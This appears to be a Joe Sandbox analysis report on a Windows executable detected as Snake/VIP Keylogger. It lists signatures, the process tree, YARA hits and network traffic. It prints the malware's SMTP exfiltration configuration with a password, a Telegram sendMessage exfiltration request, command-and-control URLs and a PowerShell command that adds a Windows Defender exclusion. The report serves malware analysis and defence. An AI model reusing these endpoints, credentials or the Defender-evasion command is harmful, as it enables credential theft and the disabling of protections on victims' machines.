Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3GrfjMY0pG.exe

Overview

General Information

Sample name:3GrfjMY0pG.exe
renamed because original name is a hash value
Original sample name:6506e06b9b96e41137ca0ff6be68c11c31804d350277ef345454459d4c2228bf.exe
Analysis ID:1632224
MD5:81c7a597ad8d19b00d5659cd0dbbe2f7
SHA1:ec0f5b404d99a1b5cc71833974d033b7b512dcbf
SHA256:6506e06b9b96e41137ca0ff6be68c11c31804d350277ef345454459d4c2228bf
Tags:exeVIPKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 3GrfjMY0pG.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\3GrfjMY0pG.exe" MD5: 81C7A597AD8D19B00D5659CD0DBBE2F7)
    • powershell.exe (PID: 476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7020 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • 3GrfjMY0pG.exe (PID: 6092 cmdline: "C:\Users\user\Desktop\3GrfjMY0pG.exe" MD5: 81C7A597AD8D19B00D5659CD0DBBE2F7)
  • svchost.exe (PID: 6084 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "logs@aewn.buzz", "Password": "7213575aceACE@@", "Host": "mail.aewn.buzz", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "logs@aewn.buzz", "Password": "7213575aceACE@@", "Host": "mail.aewn.buzz", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2daa0:$a1: get_encryptedPassword
          • 0x2e028:$a2: get_encryptedUsername
          • 0x2d713:$a3: get_timePasswordChanged
          • 0x2d82a:$a4: get_passwordField
          • 0x2dab6:$a5: set_encryptedPassword
          • 0x307d2:$a6: get_passwords
          • 0x30b66:$a7: get_logins
          • 0x307be:$a8: GetOutlookPasswords
          • 0x30177:$a9: StartKeylogger
          • 0x30abf:$a10: KeyLoggerEventArgs
          • 0x30217:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          5.2.3GrfjMY0pG.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.3GrfjMY0pG.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              5.2.3GrfjMY0pG.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                5.2.3GrfjMY0pG.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2dca0:$a1: get_encryptedPassword
                • 0x2e228:$a2: get_encryptedUsername
                • 0x2d913:$a3: get_timePasswordChanged
                • 0x2da2a:$a4: get_passwordField
                • 0x2dcb6:$a5: set_encryptedPassword
                • 0x309d2:$a6: get_passwords
                • 0x30d66:$a7: get_logins
                • 0x309be:$a8: GetOutlookPasswords
                • 0x30377:$a9: StartKeylogger
                • 0x30cbf:$a10: KeyLoggerEventArgs
                • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                5.2.3GrfjMY0pG.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3b26e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3a911:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3ab6e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3b54d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 23 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3GrfjMY0pG.exe", ParentImage: C:\Users\user\Desktop\3GrfjMY0pG.exe, ParentProcessId: 6956, ParentProcessName: 3GrfjMY0pG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", ProcessId: 476, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3GrfjMY0pG.exe", ParentImage: C:\Users\user\Desktop\3GrfjMY0pG.exe, ParentProcessId: 6956, ParentProcessName: 3GrfjMY0pG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", ProcessId: 476, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3GrfjMY0pG.exe", ParentImage: C:\Users\user\Desktop\3GrfjMY0pG.exe, ParentProcessId: 6956, ParentProcessName: 3GrfjMY0pG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe", ProcessId: 476, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6084, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T21:08:31.719830+010028033053Unknown Traffic192.168.2.1149704104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T21:08:26.773785+010028032742Potentially Bad Traffic192.168.2.1149699193.122.6.16880TCP
                2025-03-07T21:08:29.289655+010028032742Potentially Bad Traffic192.168.2.1149699193.122.6.16880TCP
                2025-03-07T21:08:32.461250+010028032742Potentially Bad Traffic192.168.2.1149706193.122.6.16880TCP
                2025-03-07T21:08:35.226912+010028032742Potentially Bad Traffic192.168.2.1149709193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T21:08:54.381923+010018100071Potentially Bad Traffic192.168.2.1149721149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 3GrfjMY0pG.exeAvira: detected
                Source: 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs@aewn.buzz", "Password": "7213575aceACE@@", "Host": "mail.aewn.buzz", "Port": "587"}
                Source: 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@aewn.buzz", "Password": "7213575aceACE@@", "Host": "mail.aewn.buzz", "Port": "587", "Version": "4.4"}
                Source: 3GrfjMY0pG.exeVirustotal: Detection: 75%Perma Link
                Source: 3GrfjMY0pG.exeReversingLabs: Detection: 71%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: logs@aewn.buzz
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: 7213575aceACE@@
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: mail.aewn.buzz
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: log@aewn.buzz
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: 587
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor:
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: logs@aewn.buzz
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: 7213575aceACE@@
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: mail.aewn.buzz
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: log@aewn.buzz
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: 587
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor:
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: logs@aewn.buzz
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: 7213575aceACE@@
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: mail.aewn.buzz
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: log@aewn.buzz
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor: 587
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpackString decryptor:

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: 3GrfjMY0pG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49700 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49710 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49721 version: TLS 1.2
                Source: 3GrfjMY0pG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: 3GrfjMY0pG.exe, 00000000.00000002.1196994849.0000000006430000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: 3GrfjMY0pG.exe, 00000000.00000002.1196994849.0000000006430000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Jmdv.pdbSHA2560y* source: 3GrfjMY0pG.exe
                Source: Binary string: Jmdv.pdb source: 3GrfjMY0pG.exe
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]0_2_01623E0C
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 0147F8E9h5_2_0147F631
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 0147FD41h5_2_0147FA88
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9E959h5_2_06C9E6B0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C931E0h5_2_06C92DC8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C90D0Dh5_2_06C90B30
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C91697h5_2_06C90B30
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C92C19h5_2_06C92968
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9E0A9h5_2_06C9DE00
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9F209h5_2_06C9EF60
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9CF49h5_2_06C9CCA0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C931E0h5_2_06C92DBE
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9D7F9h5_2_06C9D550
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9E501h5_2_06C9E258
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9F661h5_2_06C9F3B8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9EDB1h5_2_06C9EB08
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9D3A1h5_2_06C9D0F8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_06C90040
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9FAB9h5_2_06C9F810
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C9DC51h5_2_06C9D9A8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 4x nop then jmp 06C931E0h5_2_06C9310E

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.11:49721 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:00:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49709 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49706 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49699 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49704 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49700 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49710 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:00:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 20:08:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: svchost.exe, 00000006.00000002.2850458467.0000017E6D600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
